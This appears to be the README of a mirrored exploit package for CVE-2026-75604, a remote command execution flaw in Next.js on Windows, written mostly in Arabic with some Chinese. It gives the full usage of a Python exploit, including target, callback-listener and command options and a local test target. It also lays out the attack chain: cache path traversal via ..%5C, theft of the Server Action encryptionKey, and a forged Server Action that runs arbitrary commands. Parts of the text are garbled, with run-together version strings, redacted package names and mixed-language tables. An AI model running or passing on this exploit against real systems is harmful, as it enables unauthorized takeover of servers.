
إثبات مفهوم لاستغلال CVE-2026-75604، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Next.js المستضاف على Windows عبر اجتياز مسار ذاكرة التخزين المؤقت وإجراء خادم مزوّر، للاختبار الأمني المصرح به.
إثبات مفهوم بلغة Python لثغرة CVE-2026-75604، وهي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في تطبيقات Next.js المستضافة على Windows والتي تستخدم كلاً من Pages Router وApp Router بدون Cache Components.

>=13.4 <15.5.24 أو >=16.0 <16.3.3تم التحقق منه مع [email protected].
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
مسار Server Action الافتراضي هو /. استخدم --action-field عندما يحتوي النموذج على أكثر من حقل واحد.
الوسائط المطلوبة:
--target URL: عنوان URL الأساسي لتطبيق Next.js--callback-ip ADDRESS: عنوان IPv4 يمكن للهدف الوصول إليه--pages-cache-path PATH: صفحة ISR ديناميكية موجودة في Pages Router--app-cache-path PATH: صفحة App Router ديناميكية موجودة مدعومة بذاكرة التخزين المؤقت على نظام الملفاتالوسائط الاختيارية:
--command COMMAND: الأمر المراد تنفيذه؛ الافتراضي هو whoami--action-path PATH: صفحة App Router التي تحتوي على Server Action المتوافق؛ الافتراضي هو /--action-field NAME: حقل النموذج الذي يستهلكه الإجراء؛ يتم اكتشافه تلقائياً عندما يكون غير غامض--callback-port PORT: منفذ الاستدعاء؛ الافتراضي هو 4331--listen-address ADDRESS: عنوان الربط المحلي للاستدعاء؛ الافتراضي هو 0.0.0.0--timeout SECONDS: مهلة الطلب والاستدعاء؛ الافتراضي هو 20--insecure: تعطيل التحقق من شهادة TLSتطبيق target/ الاختياري يثبّت [email protected] ويستخدم خادم إنتاج Next.js القياسي:
cd target
npm ci
npm run build
npm start
شغّل الـ PoC في طرفية أخرى:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
يوفر الهدف الاختياري المسارات المطلوبة وServer Action متوافق على /.
تم توفير هذا الـ PoC لأغراض تعليمية وبحوث أمنية واختبارات مصرح بها فقط. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
الفضل يعود إلى evolutionstorm.
تم إعادة بناء هذا الـ PoC بشكل مستقل من الاستشارة العامة وتصحيح Next.js.
本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。
AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H>=13.4 <15.5.24、>=16.0 <16.3.315.5.24 / 16.3.3المبدأ الأساسي:FileSystemCache على Windows لا يعامل الشرطة المائلة العكسية(\) كمحدد مسار للتهريب، لذا يمكن للمهاجم استخدام ترميز ..%5C لاجتياز مسار التخزين المؤقت، وقراءة الملف الحساس server-reference-manifest.json، وكشف encryptionKey الخاص بـ Server Action، ثم تزوير طلب Server Action مرتبط بالإغلاق لتنفيذ أوامر عشوائية.
python -m pip install -r requirements.txt(cryptography、requests)تم التحقق منه على [email protected].
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
--pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
--app-cache-path /PATH/TO/APP_CACHE_INSTANCE
| 参数 | 必填 | 说明 |
|---|---|---|
--target URL | نعم | عنوان URL الأساسي لتطبيق Next.js |
--callback-ip ADDRESS | نعم | عنوان IPv4 يمكن للهدف الاتصال به |
--pages-cache-path PATH | نعم | صفحة ISR ديناميكية موجودة في Pages Router(نقطة الاجتياز) |
--app-cache-path PATH | نعم | صفحة App Router ديناميكية موجودة تستخدم ذاكرة التخزين المؤقت على نظام الملفات |
--command COMMAND | لا | الأمر المراد تنفيذه(الافتراضي whoami) |
--action-path PATH | لا | صفحة App Router التي تحتوي على Server Action متوافق(الافتراضي /) |
--action-field NAME | لا | حقل العمل الذي يستهلكه النموذج(يُكتشف تلقائياً عندما يكون فريداً) |
--callback-port PORT | لا | منفذ الاستدعاء(الافتراضي 4331) |
--listen-address ADDRESS | لا | عنوان الاستماع المحلي للاستدعاء(الافتراضي 0.0.0.0) |
--timeout SECONDS | لا | مهلة الطلب والاستدعاء(الافتراضي 20) |
--insecure | لا | تعطيل التحقق من شهادة TLS |
يوفر مجلد target/ في المستودع تطبيقاً مثالياً قابلاً لإعادة الإنتاج(مثبّت على [email protected]، خادم إنتاج قياسي):
cd target
npm ci
npm run build
npm start
شغّل في طرفية أخرى:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
--pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
يوفر الهدف المثالي المسارات المطلوبة وServer Action متوافق على /.
هذا الـ PoC مخصص للأغراض التعليمية وبحوث الأمان والاختبارات المصرح بها فقط، ويجب تشغيله فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. يؤدي الاستغلال إلى تنفيذ أوامر عشوائية على مضيف Windows الهدف، لذا اختبره في بيئة قابلة للتدمير.
LICENSE).